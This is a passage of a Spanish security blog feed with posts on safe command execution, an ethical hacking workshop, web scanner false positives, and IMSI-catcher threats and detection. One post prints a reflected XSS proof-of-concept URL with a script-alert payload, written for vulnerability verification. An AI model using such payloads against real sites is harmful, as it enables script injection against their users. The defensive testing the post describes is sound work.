Ejemplo 3:

Ejecutar y mostrar el resultado de listar los archivos de un directorio "ls -ls", utilizando parametrización del comando y usando tuberías en lugar de ejecución directa en la SHELL, es una forma más segura de ejecutar comandos directamente en sistema, evitando ataques de COMMAND OS Injection sobre vuestro código, claro esta que esto es meramente un ejemplo didáctico y las diferencias entre los ejemplos son minimamente significativas.

CODE_

Example python code - e3.py

Ejecución

ST2Labs > python e3.py

OUT_

Example 3 - Run a secure system command.

Todos los ejemplos los puedes descargar desde mi repositorio ST2Labs en GitHub (https://github.com/ST2Labs/ST2Example).

#ST2Labs

Taller de Iniciación al Hacking Ético

noreply@blogger.com (Julian J. Gonzalez) — Fri, 23 Jan 2015 10:07:00 +0000

Hola a tod@s

Hace tiempo que no escribo ningún artículo, esto no es por falta de ganas, sino más bien de tiempo (muchas ideas se pasan a diario por mi cabeza, y muchas otras historias sobre las que me gustaría escribir) pero aquí estoy escribiendo estas lineas sobre mi participación en el próximo Taller de Hacking Ético que organización Asociación Nacional de Tasadores y Peritos Informáticos Judiciales , junto a UDIMA (Universidad a Distancia de Madrid) y Aconsa Seguridad.

Fruto de ese trabajo diario, tengo el placer de anunciaros que la Asociación Nacional de Tasadores y Peritos Informáticos Judiciales ha organizado una excelente ocasión de aprender técnicas de Hacking de los profesores del Curso sobre Hacking Ético que ofertan.

Mi participación será con un Taller exclusivo sobre Metasploit, para ofrecer a los alumnos la visión y posibilidad que ofrece la herramienta, siempre con el punto de vista puesto en el enfoque practico.

INFORMACIÓN DEL TALLER

Fecha: 30 y 31 de Enero 2015

Lugar: C/ Melilla 19, Centro de Estudio Tecnológicos

Precio:

Socios ANTPJI 100€
Profesionales 300€
Alumnos del Master en Informática Forense y Delitos Informáticos, Hacking Ético en Sistemas y Redes. GRATUITO

Viernes 30 de Enero 2014

16:00 a 18:00h "Metodología de ataques digitales en el mundo real" a cargo de D. Roberto Peña

18:00 a 20:00h "Taller de Metasploit" a cargo de D. Julian Gonzalez

Sábado 31 de Enero 2014

10:00 a 12:00h "Taller de Auditoría de Sistemas en entornos web" a cargo de D. Raul Morales

No te pierdas este taller de iniciación al Hacking Ético donde tendras la oportunidad no solo de aprender las bases del Hacking Ético, sino también conocer a los profesor del curso universitario de Hacking Ético en Sistemas y Redes que inicia el próximo 2 de febrero.

INSCRIBETE AL TALLER

#ST2Labs
@rhodius
@st2labs
@seguridadparatodos

Feliz IV Navidad | Merry xMaS

noreply@blogger.com (Julian J. Gonzalez) — Tue, 30 Dec 2014 11:31:00 +0000

Ya son las IV (4) Navidades juntos !!!!!

¡Cómo pasa el tiempo¡ , sigo y seguiré compartiendo los buenos momentos con todos vosotros a través del Blog y Twitter @seguridadxato2 @st2labs

Finalizo el año ilusionado con el nuevo proyecto de vigilancia de páginas WEB (webguardshield.com) y con la vista puesta en el lanzamiento de secnapsis.com | Si olvidarme de mis alumnos del Máster de Seguridad TIC que en su 2 edición habrá más Hacking, más Metasploit y algo de Python para Hackers, siempre con la ilusión de cada año, en cada edición intentamos superar sus expectativas y eso, genera la necesidad de renovarse en un ciclo constante!!!

Y por supuesto de cara a un nuevo año, ST2Blog renueva imagen más acorde con las actividades y contenido que nos espera! #HappyHacking2015

Esperemos que este nuevo año que va a dar comienzo, nos traiga a todos #ciberseguridad y buenas practicas!!

Nos vemos en 2015 !!! ah!! y por supuesto os deseo un Feliz Año Nuevo!

PD: Espero poder escribir algunos #post sobre los nuevos proyectos muy pronto!

@ST2Labs

Julian J. Gonzalez (@rhodius)

Análisis de Vulnerabilidades WEB y los falsos positivos

noreply@blogger.com (Julian J. Gonzalez) — Wed, 05 Nov 2014 19:27:00 +0000

En el Análisis de Vulnerabilidades es muy frecuente que se realicen varios test / scanner con diferentes herramientas para llevar a cabo una eliminación de falsos positivos (especialmente durante Auditorias de Seguridad a aplicación WEB). Una vez tienes el resultado, se verifican manualmente los resultados con objeto de ofrecer un informe con el mínimo número de falsos positivos posibles.

En un CSIRT (Computer Security Incident Response Team), una de sus funciones es el descubrimiento y análisis de vulnerabilidades; Fue durante un análisis rutinario donde ocurrio algo curioso que paso a comentar a continuación.

Durante la revisión manual de un análisis de vulnerabilidades a una página WEB encontré discrepancia entre varias herramientas, en particular entre el resultado obtenido con w3af y Vega, donde una herramienta (VEGA) informaba de una posible vulnerabilidad XSS, mientras que otra ni si quiera lo mencionaba.

En la verificación manual, el típico <script>alert(1);</script>, tampoco mostraba ninguna constancia de la existencia de dicha vulnerabilidad XSS, probando algunas de las variantes, encontré al final una sentencia que confirmaría la existencia de la vulnerabilidad:

POC - XSS Vulnerable

Comando (XSS):

http://www.example.com/index.php?var='<script>alert('XSS Vulnerable');</script>

Fue entonces, cuando decidí buscar información sobre la precisión que tenia la herramienta w3af en el análisis de vulnerabilidades y encontré un proyecto Open Source (WAVSEP) que se encarga precisamente de evaluar herramientas de seguridad, aplicando varias pruebas sobre entornos vulnerables.

El ultimo informe WAVSEP 2013/2014, se analizan múltiples herramientas de seguridad tanto comerciales como open source; y si accedéis a la página web con el brenchmark (score board), encontrareis un completo análisis de cada herramienta con la precisión, falsos positivos, etc ordenado por tipo de ataque (XSS, SQLi, ..).

W3af - WAVSEP Score

Curiosamente, w3af no sale muy bien parado en éste análisis, y si además, puedo confirmar que no detecto una vulnerabilidad del tipo XSS, lo que me lleva a descartar la herramienta y buscar otra que sea open source.

Vega - WAVSEP Score

En la puntuación (score) del brenchmark, VEGA (la herramienta que había utilizado y que ha detectado dicha vulnerabilidad XSS), obtiene muy buen resultado (0% falsos positivos en XSS reflected), si a esto le unimos que w3af obtenía también algunos otros falsos positivos.

Fue el momento de examinar con algo de más detenimiento el brenchmark y encontré wapiti, una herramienta de línea de comando escrita en python, múltiples formatos de salida y que además obtiene mejor puntuación en el brechmark que w3af.

Realice un test de la herramienta en la misma página web, ejecutando solamente el motor de XSS, y lo detecto a la primera. Además la herramienta tiene un modulo de detección de XSS persistentes, lo que lo hace aún más interesante.

Será en mi próximo artículo cuando hablaré de la herramienta wapiti, que esta incluida en KaliLinux, pero que también se encuentra disponible para windows (Pyexe) y en su versión de desarrollo, SVN incluye un modulo de detección de shellshock (ultima actualización SEP/14).

#ST2Labs

#ACS iSecurity

#CSIRT Team Leader

@ACSHackLabs

@ST2Labs

Android IMSI-Catcher-Detector AIMSICD

noreply@blogger.com (Julian J. Gonzalez) — Thu, 23 Oct 2014 16:16:00 +0000

Las vulnerabilidad en el protocolo GSM/3G no es algo novedoso (véase mi articulo al respecto), todos sabemos que cuando no disponemos de cobertura H+/4G, la estación base y el móvil negocian conectarse mediante 2G/GSM/GPRS para no quedarte sin cobertura.

Uno de los ataques que esta cogiendo popularidad es utilizar falsa estaciones base (fake BTS) para capturar el IMSI de los terminales móviles en el radio de acción en el que actúa. La policía, lo suele utilizar en concentraciones / manifestaciones, y/o para rastrear a determinados usuarios/delincuentes.

Tengo el IMSI, y ¿ahora que?

El IMSI (Identidad Internacional del Abonado a un Móvil), una vez se tiene la identificación del abonado, se puede realizar un ataque de suplantación de identidad, spoofing de SMS, llamar a cargo de la cuenta del abonado, etc.

Por ejemplo, en países como Rusia, China o Brazil, los ciberelincuentes están montando estaciones base (Fake BTS) donde capturar el IMSI para realizar SPAM y/o ataques de Phising mediante mensajes de texto (SMS).

A esto hay que añadir que los "hackers" están aplicando ingeniería inversa a las NSA-Tools, y están liberando aplicaciones como TWILIGHTVEGETABLE conjunto de herramienta capaz de monitorizar (capturar) de forma pasiva la red GSM, o DRIZZLECHAIR son 2TBytes con todas las herramientas necesarias, así como pre-hashed (rainbow tables) para crackear (descifrar) el cifrado A5/1 de GSM. !! Es solo cuestión de tiempo que cualquiera pueda espiar las comunicaciones GSM de tu barrio ¡¡

SOLUCIÓN / PROTECCIÓN

Solo existe una solución "preventiva" sería configurar el móvil para evitar que se conecte a la red GSM (2G), esto tiene la ventaja de proteger en los ataques al protocolo GSM, aunque por contra, te quedarías sin cobertura en algunas zonas / edificios.

No obstante, deshabilitar la red 2G, protege frente a los ataques de cifrado de GSM, pero recientemente se publico que la red 3G tiene una debilidad que permite capturar el ISMI (en el proceso de formar al móvil en 3G a utilizar 2G), por lo que solamente en 4G podríamos decir que estaríamos completamente protegidos (de momento). Aunque tendríamos que poder deshabilitar la red 2G/3G en el móvil, ya que los atacantes pueden formar mediante la Fake BTS a que el terminal móvil utilice 2G/3G.

Por esta razón, se ha liberado la aplicación para Android AIMSICD (Android IMSI-Catcher-Detector), que detecta y evitar que las estaciones base falsa (fake BTS) en redes GSM/3G capturen el ISMI en terminales móviles con Android.

REFERENCIAS

NSA-Killings with IMSI-Catcher drones.
How easy it is to clone phones.
Talk by Karsten Nohl and Luca Melette on 28c3: Defending mobile phones.
Stingrays: Biggest Technological Threat.
GSOC reveals hidden IMSI-Catcher.
AIMSICD